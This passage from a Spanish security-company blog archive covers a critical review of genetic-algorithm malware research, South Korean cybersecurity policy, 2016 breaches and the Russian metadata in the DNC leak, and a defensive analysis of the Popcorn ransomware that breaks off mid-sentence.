Collection5, de 2006, o Malgenome de 2012) que si bien garantizan cierta homogeneidad entre estudios y heterogeneidad entre las muestras en sí, en el mejor de los casos están obsoletas y en el peor están lejos de suponer una muestra representativa del malware real que afecta a los sistemas hoy por hoy. Funcionalidades extraídas de las muestras para representarlas: Aquí también se observan aproximaciones "típicas", como las características intrínsecas y estáticas de un fichero binario, y otras más audaces como los comportamientos tras un análisis dinámico, n-grams de opcodes o bytes. En la combinación de estas tres variables radica la posibilidad de proponer sistemas más o menos interesantes desde el punto de vista de la industria de la seguridad y el malware. ¿Entonces sirven o no sirven para algo específicamente? Así, aunque cada artículo proclame mejoras en los ratios de detección o clasificación de malware, la relación directa entre los algoritmos genéticos y su papel en la mejora de algún aspecto en algún campo del malware queda de alguna manera distanciada. Fundamentalmente, creemos que por tres razones: El uso de algoritmos genéticos como optimizadores de los clasificadores, tal y como se defiende en varios de los experimentos analizados, consume muchos recursos, lo que invalida prácticamente su uso en sistemas en tiempo real de detección de malware a no ser que optimicen tanto los algoritmos como los sistemas de procesamiento. Los resultados obtenidos dependen en buena parte del conjunto de muestras tomadas. En la industria del malware, las casas antivirus ya utilizan tecnología de clasificación automática previa como paso anterior a la creación de firmas y para agilizar el proceso. En este momento del proceso (que no requiere tiempo real) se obtienen clasificaciones con un nivel de "accuracy" muy por debajo de los niveles de precisión obtenidos en los estudios, que luego son refinados por analistas. Si bien las investigaciones permitirán mejorar ese proceso, no se suele llegar a niveles de "accuracy" tan altos en los laboratorios. Esto quiere decir que los experimentos actúan sobre conjuntos excesivamente idealizados. El uso de algoritmos genéticos para evolucionar firmas o funcionalidades del malware resulta inapropiado por las razones expuestas más arriba. Quizás el estudio más interesante resulte en la posibilidad de modelar scripts en forma de grafos y utilizar algoritmos genéticos para encontrar grafos isomórficos y por tanto malware similar. Si fuese extrapolable a binarios y se realizaran pruebas sobre un conjunto de muestras más amplio, podría resultar en una verdadera evolución donde los algoritmos genéticos jugasen un papel interesante. Parece el trabajo que mejor utiliza el conocimiento del problema para modelar su solución, fundamental para mejorar el rendimiento y potenciar la utilidad de los algoritmos genéticos. Herramientas interesantes Por otro lado, recopilamos aquí los programas que implementan o facilitan el uso de algoritmos genéticos desde el punto de vista tanto didáctico como práctico. Algunos mencionados o usados y disponibles de forma pública son: KEEL: una herramienta de software diseñado para resolver una amplia gama de problemas de minería de datos (regresión, clasificación, asociación, agrupamiento...) mediante la generación de experimentos estándar y educativos, y para evaluar algoritmos evolutivos. https://github.com/carlosnasillo/Hybrid-Genetic-Algorithm , una herramienta para evolucionar firmas a partir de un conjunto dado. Educational Genetic Algorithms Training tool: , aunque de 2001, permite de forma gráfica aprender el funcionamiento de estos algoritmos. JGAP, un framework para programar algoritmos genéticos en Java. NeuCom - A Neuro-computing Decision Support Enviroment. * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (I) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (II) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (III) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (IV) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (V) Sergio de los Santos ssantos@11paths.com @ssantosv
9 de enero de 2017
Continúa la aventura: Un hacker en Corea II
Como mencioné en la primera entrega, Corea de Sur es un país que está muy lejos de occidente, y no solo me refería a la distancia física. Durante mi estadía, tuve la suerte de conocer sus planes referidos a investigación e implementación de tecnología IoT, Big Data, Cloud Computing -mi trabajo final se refirió a esto-, análisis forense, OSINT, SmartGrid y redes 5G que planean desplegar en todo el país para 2020 (hasta 1.000 veces más rápidas que una conexión 4G LTE actual). Como nos ha enseñado Sheldon, el ámbito de la investigación está totalmente separado de la experiencia práctica, lo que permite a los investigadores y profesores (considerados poco menos que semi-dioses y millonarios) dedicarse a estudiar lo que nos depara la tecnología del futuro. Incluso me sucedió que, al realizar una pregunta a un investigador sobre la implementación de un producto, la respuesta fue “ yo no me dedico a eso”. Lo “extraño” no es que los coreanos investiguen sobre estos temas, porque muchos países lo hacen; lo extraño es que hablan de ellos con la madurez necesaria para estar en un estadío de investigación avanzado, porque ya han superado las etapas de pruebas, implementación y uso. Es decir, que la investigación y la innovación (el famoso I+D) es un estado permanente. Un ejemplo: cuando mencionan procesamiento en Big Data, no lo hacen desde la explicación clásica de la razón necesaria para implementar esta filosofía porque, al analizar tendencias, costos, ubiquidad y usabilidad es obvio; lo hacen desde el punto de vista de la investigación, para mejorar la Inteligencia en los próximos 10 años. Y digo inteligencia, definida en forma sencilla, como: • procesamiento de datos = información; • procesamiento de información = inteligencia; • procesamiento de inteligencia = ¿ Inteligencia Artificial completa? Me alegró comprobar que esta definición es la misma que llevamos adelante desde ElevenPaths con el desarrollo de Sinfonier, CyberThreats y Tacyt, las herramientas de ciberinteligencia que hemos puesto a disposición de nuestros clientes. Para los coreanos, un dispositivo IoT no es innovación, cómo mejorar la sociedad con ellos, sí lo es. El objetivo final son las “ Tres I”: Innovación, Inteligencia y ser Invisibles. La tecnología no debe ser un impedimento, sino una herramienta para lograr los objetivos del Estado y la sociedad. Por ejemplo, los coreanos tienen una de las tasas más alta de innovación en cosméticos, pero este no es el lugar para profundizar sobre ese tema. Así que, hablando de IoT, en un país hasta donde los inodoros son inteligentes, su despliegue se basa en el análisis de los distintos tipos de dispositivos y se recomienda que la conexión Machine-To-Machine (M2M) deba ser implementada por etapas, de acuerdo al siguiente orden: Electricidad hogareña. Por eso la importancia de las Smart Grids, el uso de energías renovables y su campo de pruebas en la Isla de Jeju, una de las 7 maravillas del mundo y de la que hablaremos en las próximas entregas. Por ejemplo, la siguiente maqueta muestra una “ciudad inteligente” basada en SmartGrid. El cuidado de la salud, fundamental en Corea por dos motivos antagónicos: tienen uno de los mejores sistemas de salud, pero una de las tasas de suicidio más altas del mundo (debido al nivel de exigencia en estudiantes y profesionales). Transporte. Una de las experiencias que más disfrute durante mi estadía (junto a las 250 variedades de Kimchi). La comodidad y precisión del sistema público de transporte (metro, bus y tren) son simplemente asombrosos, y todo a través de una tarjeta de viaje única. Control de desastres. Orientado a la detección temprana de cualquier tipo de siniestro natural o causado por el hombre -puede ser un incendio doméstico, un terremoto o un ataque nuclear-. Manufactura y construcción. Una de las industrias más importantes del país, con Hyundai y Samsung a la cabeza. Energía nacional, íntimamente relacionado con el primer punto. En este orden, con el cual podemos o no estar de acuerdo, nuevamente aparece la definición del Estado como ente rector sobre lo mejor para los ciudadanos. Lo importante que se debe remarcar es que existió el debate, y si bien es un trabajo en proceso, permitiría establecer dónde estarían los dispositivos inteligentes, cómo se usarían y cómo se los debería proteger, por ejemplo, a través de soluciones criptográficas aplicadas a IoT. Y, todo lo anterior lo hacen pensando en la seguridad de la información, considerando los siguientes aspectos: Seguridad por diseño en infraestructura, arquitectura y desarrollo de cualquier tipo de dispositivo y aplicación. Aquí para mí lo “extraño” es que luego de 10 años brindando capacitaciones en las organizaciones sobre seguridad por diseño, aparece un país que lo hace en toda su infraestructura nacional. Ya no hay que discutir con un CEO, CSO o CTO si es positivo para la organización; el país ha decidido que sea una política de Estado. Garantías de seguridad (assurance) para desarrollar e implementar software que protege los datos y recursos de los usuarios. Quizás, este es el punto que menos se cumple ya que existen errores y posibles vulnerabilidades que permitirían tener acceso a datos sensibles de los ciudadanos. Un investigador y residente extranjero se encargó de mostrarnos varios de estos fallos, pero prometió “hacernos cosas horribles si las divulgábamos”. En la era digital, si no se respetan la identidad del usuario y sus datos, la centralización de la información no siempre es positiva. Asegurar la cadena de provisión, parece obvio, pero si solo uno de los integrantes de una cadena es vulnerable, toda la cadena lo es. Por ejemplo, SandaS GRC (Gobierno, Riesgo y Cumplimiento) permite a las organizaciones soportar su estrategia de negocio, mejorar el desempeño operativo y mitigar los riegos operacionales para asegurar el cumplimiento regulatorio. No quería caer en el lugar común de “la cadena es tan fuerte como el más débil de los eslabones” pero aquí está presente. Calificación en seguridad. Como mencionaba en el artículo anterior, la capacitación y entrenamiento en ciberseguridad es considerado desde las primeras etapas de la educación primaria y secundaria. Las computadoras, móviles y cibercafés son parte de la vida de los coreanos, jugar Starcraft es una carrera que los jóvenes puede elegir y el hacking se practica desde niños. ¿Qué más se puede pedir? Por eso, desde ElevenPaths organizamos Webcasts semanales sobre temáticas de interés en seguridad de la información. Como puede verse, para los coreanos el mundo físico -expuesto a una bomba- está íntimamente relacionado con el mundo virtual -vulnerable a un DDoS o una APT- y han comprendido que en ambos campos de batallas hay mucho para perder. Las reglas del mundo físico no siempre aplican al ciberespacio y, como es difícil encajar las reglas del primero en el segundo, se han establecido grupos de investigación en Legislación Internacional. Se busca innovar en las leyes del nuevo siglo con el ciberespacio como principal protagonista. Así, Corea ha participado en la redacción del nuevo Manual de Tallin -la ley aplicable a la ciberguerra y que debería publicarse muy pronto- y en su protocolo internacional de actuación. Finalmente, han establecido un código de conducta en Internet que, aunque puede parecer un poco drástico y aburrido ( la pornografía está prohibida) es destacable mencionar. Todas estas situaciones hacen reflexionar hacia donde evoluciona la sociedad y plantea un desafío gigante cuando se intenta discutir estrategias y tratados de seguridad internacional. En la próxima entrega veremos cómo, a pesar de los controles, el cibercrimen es una amenaza sumamente importante en Corea y cuales han sido las medidas que han tomado. Cristian Borghello ElevenPaths Argentina Cristian.borghello@11paths.com @crisborghe También te puede interesar: Un hacker en Corea_El inicio Un hacker en Corea III Un hacker en Corea IV
5 de enero de 2017
La carta de un hacker a los Reyes Magos
Queridos Reyes Magos, Hace años que no les escribo pero este he querido volver a hacerlo porque, a pesar de todos los avances conseguidos en 2016 por parte de todos los integrantes del sector de la ciberseguridad, todavía persisten ciertos aspectos que necesitan mejorar y necesito que me echéis una mano. La asignatura en la que peor nota hemos sacado ha sido en colaboración entre Fuerzas y Cuerpos de Seguridad y empresas tecnológicas. Los primeros tratan de hacer su trabajo con la dificultad que entrañan aquellos delitos que se comenten a través de la red o que se ha utilizado como herramienta para la comunicación. Y, algunos de los segundos, en aras de luchar por la privacidad de los usuarios se han negado a compartir su información. Aunque, ahora que no nos escucha nadie, creo que tampoco les interesa demasiado cuando esta colaboración no les genera un rédito económico. La masacre de San Bernardino desató una guerra tanto legal como mediática entre gran parte de los fabricantes de tecnología y el FBI después de que Apple se opusiera fuertemente a liberar un iPhone propiedad de un presunto terrorista. Sin embargo, no ha sido la única compañía que ha tenido problemas con la justicia este año. El vicepresidente de Facebook en Latinoamérica también fue detenido por la Policía Federal de Brasil al negarse a compartir información con las autoridades por una investigación sobre el tráfico de drogas. En 2016 algunos de los fabricantes comenzaron a tomar medidas para adecuarse a las necesidades de los nuevos tiempos en materia de privacidad. La implementación del cifrado punto a punto, como fue el caso de Whatsapp, o el reporte periódico que hace Google sobre el número de peticiones de información sobre sus usuarios por parte de las Fuerzas y Cuerpos de Seguridad han sido algunas de ellas. Sin embargo, esta situación también ha provocado que en algunos países como Rusia se presione desde el gobierno a la implantación de backdoors por ley o que en otros como China se obligue a las tecnológicas a «colaborar» en aquellos temas considerados como seguridad nacional. ¡Miedo me da saber qué significa para ellos seguridad nacional! Aunque a veces veamos muy lejanas estas medidas, se tiene cierto temor que el terrorismo yihadista que tanto está impactando en Occidente pudiera provocar cierto cese de nuestras libertades a cambio de una mayor sensación de seguridad. Pero ojalá solo lleváramos una asignatura suspensa en el zurrón. Un viernes del pasado mes de noviembre, Twitter, Spotify y Netflix dejaron de funcionar. Hecho que dio lugar a que muchos comenzaran a interesarse por la ciberseguridad. ¡Qué pena que tenga que pasar este tipo de incidentes para que nos demos cuenta de la importancia que tiene! Esa misma tarde, la empresa Dyn publicó que no fue capaz de soportar un ataque DDoS masivo procedente de cerca de 10 millones de direcciones IP. Finalmente, se consiguieron identificar dispositivos IoT infectados por la botnet Mirai. ¿Sería posible que estos incidentes motiven a los fabricantes a considerar en 2017 la seguridad desde el diseño y la seguridad en sus dispositivos como algo necesario de implantar por defecto? Nuestro tercer suspenso se veía venir desde octubre de 2013. Momento en el que se hizo pública la fuga de información de Adobe. Pues no debió ser suficiente, ya que el año 2016 ha sido el de las fugas de información. Han afectado principalmente al sector sanitario, seguido por el del entretenimiento, las redes sociales y el gubernamental. A raíz de esto, el actual CSO de Facebook, Alex Stamos declaró que su compañía compraba contraseñas en el mercado negro. Esta medida me ponen los pelos de punta solo con pensar que pueden estar almacenando gigas y gigas de información tanto de sus usuarios como de los que no son ni clientes suyos, además de estar contribuyendo a financiar la actividad de ciberdelincuentes comprando bases de datos. Si realmente el problema es la reutilización de contraseñas, me gustaría ver en 2017 diferentes sistemas de autenticación. Aunque no os lo creáis, existen más factores los que han provocado nuestros últimos suspensos. Las cifras de 2016 sobre el número de infecciones por ransomware son alarmantes. Se estima que la frecuencia de infección en empresas es de una cada 40 segundos y uno cada diez segundos en usuarios individuales. El cibercrimen evoluciona a pasos agigantados a costa de la poca concienciación que existe sobre los peligros de internet. En relación con este último aspecto, estas navidades se hizo viral un discurso de un profesor donde explicaba a sus alumnos los motivos por los que necesitan formarse para la vida. Pero ahora la vida también se encuentra en la red. Internet ya avisó hace tiempo que venía para quedarse y todavía la gente necesita herramientas para manejarse en este ámbito. Pero no sólo los usuarios sino también los medios de comunicación. Siempre se ha dicho que el periodismo hace la función de watchdog de los gobiernos, pero la complejidad de internet hace que muchos medios prefieran permanecer en la superficialidad a la hora de señalar quiénes son nuestros verdaderos enemigos. Los periodistas acuden a zonas de conflicto para conocer lo que sucede de primera mano. Pero, ¿y lo que ocurre en la red? ¿Quién hace esa función de vigilante si realmente no se comprende? Realmente, si tengo que definir a mis compañeros de profesión lo haría con las siguientes palabras: talento, constancia y amor por lo que hacen. Sin embargo, la Administración española no está consiguiendo adaptarse a las necesidades de estos perfiles. No son perfiles al uso y si quieren que el talento español no se esfume deberán realizar modificaciones en sus procesos de selección, al igual que han hecho Estados Unidos y Reino Unido. Bueno, os tengo que ir dejando. Nos han quedado muchas asignaturas para final de curso y nos tenemos que preparar. Imaginemos que todos formamos parte de un gran equipo y que cada asignatura suspensa es una prueba de un gran capture the flag. Así nos costará menos. Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec
4 de enero de 2017
Un hacker en Corea_El inicio
Por esas extrañas coincidencias de la vida, el pasado mes de julio fui seleccionado para realizar una beca de estudio sobre Ciberseguridad en Corea del Sur, tres meses desde octubre a diciembre. Las primeras reacciones que recibí al anunciar la noticia fueron muy simpáticas e inocentes: ¿Vas a ir y volver cada 15 días? Hay que notar que desde Argentina son 19.000 Km de distancia y 32 horas de viaje. Por la diferencia horaria de 12 horas, los primeros días se vive al revés y el jetlag es difícil de superar. Una curiosidad: si se hace un agujero en Argentina, casi se llega a Corea del Sur. Literalmente estamos en las antípodas y no solo por la distancia, ya lo veremos. ¿La del Sur es la buena no? Depende para quien. ¿Ya te echaron de ElevenPaths? No, al contrario, fueron quienes me respaldaron durante estos tres meses y me hicieron sumamente fácil el proceso de estudiar y trabajar con 12 horas de diferencia. A todos ellos GRACIAS, hicieron mucho más que demostrar que la innovación es nuestro principal motor. ¿Qué vas a comer? No lo sé. ¿De ahí viene el Gangnam Style y el K-Pop? Sí, pero esa es otra historia. Éstas y otras preguntas del mismo calibre, serían la primera demostración de lo poco que conocemos sobre Asia y su cultura. Todo lo demás estaba por llegar. A Corea del Sur lo llaman “ el milagro sobre el Río Han” y no en vano este río es una metáfora de su historia, política y economía. El Río Han (Hangul: 한강) nace en Corea del Norte y, paradójicamente, este río que ha sido de tanta importancia para el crecimiento del país, también marca un límite natural entre las dos Corea -Norte y Sur, separados por decenas de problemas- y los dos Seúl -Norte y Sur unidos por decenas de puentes-. Corea tiene una historia rica y milenaria marcada por centenares de guerras, uniones y desencuentros con sus vecinos, principalmente China, Japón y Rusia. La historia no hace más que repetirse y su presente está marcado por cientos de políticas, normas y procedimientos gubernamentales relacionados al e-Government, la ciberguerra y la ciberdefensa. Por eso, estudiar ciberseguridad en la Universidad de Corea no es lo mismo que estudiarlo en otro país. Dicen que Corea del Sur es uno de los países más atacados del mundo por sus hermanos, los del Norte. Dicen que Corea del Norte es el país con mayor cantidad de atacantes del mundo; un país que, sin embargo no tiene Internet. Dicen, y es difícil debatir los “dicen”, incluso estando en el lugar. Corea del Sur es las antípoda de occidente en la cultura, las costumbres, las comidas, los horarios, las ideas, la educación, la tecnología - de allí son Samsung y LG - y la política, que desde octubre estuvo marcada por el proceso de Impeachment de su presidenta Park Geun-hye, que actualmente se encuentra suspendida por supuesto tráfico de influencias… Y, el idioma, el cual estuve estudiando tres meses y por supuesto con el cual perdí la batalla. El primer día de Universidad ya hace la diferencia: en Corea hace 16 años pensaron una política de ciberseguridad para el país, crearon laboratorios de investigación, entrenaron a su personal y crearon carreras de grado y postgrado en ciberseguridad en varias Universidades y escuelas superiores del país. Estos estudios contemplan aspectos técnicos, legales y de gestión, es decir todo lo que cualquier profesional de seguridad de la información debe conocer. Para realizar una mejor selección de los futuros profesionales y crear un semillero de expertos, se busca cerebros en las escuelas secundarias y, a partir de los 16 años, estos pequeños nuevos hackers son entrenados en programas especiales para que no se desvíen ética y moralmente y su conocimiento técnico pueda ser aprovechado por el estado. La historia de Corea y la informatización comienza en la década del 70, les sirvió como base para establecer su democracia actual y es interesante remarcar que el proceso siempre fue pensado con la seguridad como base, por la gran cantidad de incidentes relacionados con China y Corea del Norte. Por eso sus políticas de estado contemplan: Security: aquellos riesgos contra el estado y el territorio. Safety: riesgos contra los ciudadanos. National Cybersecurity: engloba los dos anteriores y es representado por decenas de organismos nacionales entre los que se puede mencionar KISA, NSRI, NCSC y NCIS. Legislación: todo el proceso de ciberseguridad fue implementado pensando primero en las leyes nacionales; no como un parche a la tecnología, sino como una estrategia para el crecimiento del país. Por todo lo anterior Corea del Sur tiene leyes de delitos informáticos desde principios de los 80 y ejecuta simulacros de ciberguerra (CyberWarfare) desde los 90. Además, estas leyes alcanzan la protección de las más de 3.000 Infraestructuras Críticas (70% nacionales) desde 2001 y las mismas son reevaluadas cada año para contemplar los nuevos riesgos y desafíos técnicos. Finalmente, Corea considera fundamentales las siguientes políticas para las organizaciones, tanto públicas como privadas: Creación de un SGSI basado en ISO 27000 pero adaptado a las necesidades del país y que debe ser implementado y certificado por cualquier organización que manipule información sensible. Cualquier organización que adquiera o desarrolle software y lo publique en un sitio web, es auditado en base a las buenas prácticas de OWASP y, si las mismas no se cumplen, la página puede ser dada de baja hasta que lo haga. Al software desarrollado en Corea, se le realizan análisis Black-box y White-box basados en Common Criteria. El estudio de la criptografía que los ha llevado a desarrollar ARIA, un algoritmo simétrico propio basado en AES y que es utilizado en todo el país. Seguramente habrá decenas de otros algoritmos, pero los mismos no son públicos. Utilización global de la firma digital para los 50 millones de ciudadanos con un “cyberID” para cada uno de ellos, el cual facilita los trámites públicos del e-Government y sí, también la ciber-vigilancia en pro de la Seguridad Nacional. Sin embargo, los ciudadanos y el gobierno no utilizan software libre y el uso de Internet Explorer con ActiveX es el estándar para cualquier actividad oficial o particular. ¿Por qué? La respuesta es sencilla y también contradictoria: al ser los primeros en implementar políticas de firma digital para el e-Government, se vieron obligados a utilizar las herramientas disponibles a principios de siglo. Actualizar dicha infraestructura a la tecnología actual es costoso, aunque ya se encuentran en dicho camino. En la próxima entrega de esta serie veremos cómo hizo Corea para implementar estas políticas a nivel nacional respetando tres principios básicos: la colaboración internacional en la lucha contra el cibercrimen; la protección de la privacidad de los datos del ciudadano (PII); y la protección de las infraestructuras críticas, en un país rodeado de “enemigos naturales” y cuyo nivel de informatización hace de la seguridad de la información sea prioridad para el gobierno. Cristian Borghello ElevenPaths Argentina Cristian.borghello@11paths.com @crisborghe También te puede interesar: Continúa la aventura: Un hacker en Corea II Un hacker en Corea III Un hacker en Corea IV
29 de diciembre de 2016
Espías, records y metadatos rusos
Hace unos días nos enteramos del asalto sufrido por Yahoo! en 2013 con la friolera pérdida de 1000 millones de cuentas de sus usuarios, datos relacionados con sus nombres, contraseñas, preguntas de seguridad, etc. y se mantuvo en secreto hasta hace pocos días, cuando finalmente la compañía tuvo que admitir que en 2014 sufrió otro ataque similar con el robo masivo de 500 millones de cuentas. Gracias a estas revelaciones se convierte en la empresa líder mundial en clientes afectados por piratería informática, donde el 97% de las 1000 empresas más grandes del mundo han sufrido filtraciones similares en sus entornos con mayor o menor repercusión. Yahoo! es una más en la larga lista de afectados por los ataques a sus bases de datos, si bien los responsables de Yahoo! no han conseguido identificar a los autores de los robos, si han intentado tranquilizar a sus clientes asegurando que sus datos bancarios, números de tarjeta y otros datos sensibles no se han visto afectados. Visto lo visto planea sobre nuestras cabezas la posibilidad de que algún día vuelva a ser noticia con peores consecuencias si no lo remedian. Este tipo de ataques o labores de espionaje no suelen ser propios de individuos independientes, si no de grupos u organizaciones especializadas con fines claramente definidos. La NSA y otros grupos de inteligencia norteamericanos han sido señalados en múltiples ocasiones como parte implicada en la obtención de información a través de los metadatos, correos electrónicos, llamadas, etc., de personas, organizaciones y hasta de gobiernos extranjeros supuestamente amigos. Otros países tradicionalmente referentes en labores de espionaje tampoco se quedan atrás. Como se comentó el pasado verano, según fuentes norteamericanas el gobierno ruso parece haber participado indirectamente en la victoria del candidato republicano y ahora presidente Donald Trump, por medio del grupo de ciberespionaje ruso The Dukes denominados así por el FBI, que estaría formado por dos equipos: Cozy Bear (APT 29) y Fancy Bear (APT 28) que extrajeron y filtraron aproximadamente 20.000 correos y datos de miembros del DNC (Comité Nacional Democrata) donde se ponía de manifiesto los duros enfrentamientos internos entre los propios aspirantes demócratas a la presidencia. Esta intrusión fue detectada por CrowdStrike en los equipos del DNC a raíz de la investigación que se llevó a cabo tras hacerse pública la filtración en junio en Wikileaks. Se sospecha que fue extraída por uno de los miembros de The Dukes, Guccifer 2.0 a raíz de las pruebas obtenidas sobre algunos documentos publicados del DNC, creados originalmente por Warren Flood (persona que se encargaba de proveer datos y servicios de análisis de estrategia a los candidatos demócratas) y donde se detectaron ciertos metadatos en ruso en este archivo Document. La traducción sería un alias, Felix Dzerzhinsky, nombre del fundador de la policía secreta soviética el pasado siglo XX. DOCUMENTO CON METADATOS DETECTADOS DE MODIFICACIÓN EN RUSO Otra de las pruebas extraídas y publicadas en varios medios muestran una serie de características que señalan aún más a su procedencia rusa: A LA IZQUIERDA UN DOCUMENTO PUBLICADO POR POR GAWKER EN PDF CON VÍNCULOS A ENLACES ROTOS EN RUSO. A LA DERECHA EL MISMO DOCUMENTO EXTRAÍDO DEL DNC PERO PUBLICADO POR GUCCIFER 2.0 El objetivo de esta filtración aparentemente consistía en favorecer la victoria de Trump republicano contra la candidata demócrata Clinton, como represalia por sus críticas a los resultados parlamentarios rusos del pasado 2011. Rusia lo niega, pero estas evidencias lógicamente generan dudas. Estos hechos no hacen más que reflejar la patente inseguridad o incapacidad de los sistemas actuales, su falta de control o gestión, la ausencia de los mismos o el dato más preocupante, la cada vez mayor inversión económica y de recursos en la creación y evolución de sistemas de penetración, espionaje y ataque cibernético, lo que demuestra que puede salir muy rentable invertir en este tipo de actividades fundamentalmente cuando en muchas ocasiones vienen respaldadas por gobiernos o agencias de inteligencia. ¿Es una guerra perdida? Evidentemente no, ambos mundos se necesitan para evolucionar y mejorar. No hay nada infalible, pero si los medios y protocolos de seguridad se aplican y siguen correctamente, se ponen las cosas muy difíciles para los ciberdelincuentes,y de eso se trata. ¿Quieres prevenir y detectar a tiempo una fuga de información? En ElevenPaths ofrecemos soluciones preventivas contra la fuga de información a través de la familia Metashield. Si quieres saber más sobre el tratamiento de metadatos, habla con nuestros expertos en Ciberseguridad en la Comunidad Técnica de ElevenPaths. Antonio Bordón CyberSecurity Product Manager
21 de diciembre de 2016
Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (V)
En esta serie de artículos se realizará un repaso a la literatura académica en la que se mezclan estos dos conceptos: malware y algoritmos evolutivos. Analizaremos de forma crítica qué trabajos y artículos se han presentado en orden cronológico durante los últimos años, para comprobar si realmente tiene sentido utilizar los algoritmos genéticos para mejorar cualquier aspecto de la lucha contra el malware, ya sea en detección, análisis, predicción… Veremos un buen montón de experimentos basado en la algoritmia evolutiva, que a su vez también resulta apasionante. Continuamos mostrando un resumen con espíritu crítico de los últimos tres artículos académicos relativos a la materia. Classifying Anomalous Mobile Applications Based on Data Flows De nuevo, en este documento se realiza un estudio en el que se pretende clasificar malware móvil ayudándose de algoritmos genéticos. En esta ocasión se utilizan secuencias de llamadas a API del sistema para modelizar a los individuos. Las características interesantes se reducen gracias a algoritmos genéticos ( de nuevo, se usan para reducir la dimensionalidad), que permiten obtener un conjunto subóptimo de llamadas a sistema que permita distinguir entre malware y goodware. El fitness usado es la tasa de verdaderos positivos m´as la precisión del clasificador usado. Los resultados en artículo y experimento resultan bastante pobres. No muestra la tasa de falsos positivos que se intuye muy alta en la tabla adjunta. Además habla de la detección dentro de una misma familia y no en general, algo que resulta mucho más sencillo y con lo que la tasa de acierto se infla artificialmente. Pocas muestras de cada familia, y una tasa de fallo que se intuye muy alta SAME: An Intelligent Anti-malware Extension for Android ART Virtual Machine En este artículo se propone SAME como un interesante sistema para detectar malware en Android basado en la ´ultima m´aquina virtual de introducida en Lollipop 5 (ARTJVM) que sustituye a Dalvik. Se basan en extraer en un momento dado de la ejecución, los "Access flags" de Java, que contienen datos sobre el tipo de clase Java que se está usando, además de otros datos como el tamaño, el nombre de la clase (si contiene mayúsculas, números), etc. Pretende distanciarse de otros estudios prescindiendo de atributos típicos de detección como los permisos. Así hasta 24 funcionalidades. Tras el proceso de extracción y correlación, se elige el conjunto de mejores funcionalidades para clasificar (minimizando el error) gracias a varios algoritmos evolutivos y se compara. Finalmente quedan 12 funcionalidades, que permite que todo el proceso sea mucho más ágil. En el estudio se utiliza el sistema neuronal MLP (Multi-Layer Perceptron) para clasificar las clases, y se optimiza con Biogeography-Based Optimizer (BBO) para entrenarlo (lo que parece un punto innovador en el estudio). BBO se basa en el concepto de islas. Cada isla es una solución al problema y las especies los parámetros de cada solución. Las especies van migrando de isla a isla y mejorando las soluciones (islas), así, se prescinde de la reproducción o descendencia. Los resultados con BBO mejoran al resto de clasificadores, se alcanza un accuracy de 96,7%, lo que resulta alentador. Aunque el artículo es de 2015, los datos escogidos se basan en aplicaciones de 2010. Los datos son buenos, pero se usan muestras de 2010 para un estudio de 2015 On the Selection of Key Features for Android Malware Characterization En este artículo se vuelven a usar algoritmos genéticos para intentar descubrir las funcionalidades más relevantes que caracterizan al malware. Se toman 49 muestras de malware de Android (una de cada familia del conjunto usado) cada una con 26 funcionalidades. Por un lado se utiliza MRMR (Minimun Redundancy Maximum Relevance), un algoritmo de filtrado que busca que las funcionalidades sean lo más relevantes posibles y mínimamente redundantes (diferentes entre sí). Por otro lado, además, se usan algoritmos genéticos básicos con dos funciones de fitness diferentes: Mutual Information (I) y Information Correlation Coefficient (ICC), dos formas de medida de teoría de la información. Los resultados muestran qué características son las más relevantes del malware, para poder, en el futuro, incluirlas como capacidades de muestras altamente sospechosas. Como se muestra en la imagen, lo más relevante es que exista un "rapackaging" y características de control remoto. Unas conclusiones bastante esperadas. Y hasta aquí el repaso a los 9 artículos académicos. En la próxima y última entrega, hablaremos de las conclusiones. * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (I) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (II) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (III) * Algoritmos evolutivos y malware. ¿Evolucionan los "virus"? (IV) Sergio de los Santos ssantos@11paths.com @ssantosv
19 de diciembre de 2016
ElevenPaths discovers the Popcorn ransomware passwords: no need to infect other people to decrypt for free
MalwareHunterTeam has discovered a new variant of ransomware that is quite curious. At ElevenPaths we have been able to download and analyze the new improved versions that make several interesting mistakes, for example one that reveals your decryption password. This sample draws attention because, in theory, it offers two formulas to decrypt the files: either by paying, or if the infected succeeds in infecting two or more people who pay the ransom. The "easy" way and… the "nasty" way Apart from what has already been commented on this new version, we focus on the most interesting aspects of the evolution that we, at ElevenPaths, have analyzed. The basic functionality is as usual: a lot of files are encrypted depending on their extension, and a ransom of 1 bitcoin is requested (above the average that is usually demanded). What this ransomware does for the first time is to offer two ways to decrypt the content: the "normal" way, in which a ransom is paid, and the "nasty" way (so they call it), in which if a link to an executable is sent to two people and they get infected and pay, you will be given a "free" code to decrypt your content. A diffusion "Refer-a-friend plan" in which the attacker "ensures" two infections for the price of one, and a more effective dissemination method, since the victims chosen by the infected user will always be more predisposed to execute the link from an acquaintance. Another option is to pay (alleged condition for the "discount"). It is also important to note that the ransomware appeals to the sensitivity of the victim, stating that the money will go to a good cause: alleviate the effects of the Syrian war. It is called "popcorn" because the first version used the popcorn-time-free.net domain, although the latest versions do not. Appealing to the sensitivity of the victim. They also lie when they say that there is nothing to do and that only they can decrypt the data. Technical aspects How does this ransomware work at a technical level? It has been developed by an independent group without following the guidelines of the "known" families, and therefore, is not very developed yet. Apart from the versions analyzed by MalwareHunterTeam, at ElevenPaths we have had access to the new samples. These are some interesting aspects that we have noticed. The program is written in C# and needs .NET4 to run. The executable is created "on the fly" for each infected user, with a unique ID code inserted for each victim. Interestingly enough, all variables are "embedded" in the code, and it is created on the server side. In addition, it does not follow the usual pattern of professional ransomware in which each file is encrypted with a different symmetric key and then this key is encrypted with asymmetric cryptography. On the contrary, all files are encrypted with the same symmetric key. From here, knowing the password is a matter of analyzing the code of the executable. The password If we disassemble the code with, for example, ILSpy we can see the line containing the password in base64. A quick decode will allow us to get the password and the data back. We have not created a specific tool to do this, as it is more than likely that the attacker quickly changes the strategy and also, for now, this malware does not seem to be very advanced or widespread (if someone is infected, please contact us). In fact, the day before the password of its first versions was always "123456". As mentioned, the password is supposed to be (along with all other variables) embedded by the server at the time the executable is created. After the analysis we have conducted, it turns out it is an MD5 hash of which we still do not know what it responds to. The MD5 hash is triply encoded with base64 in the 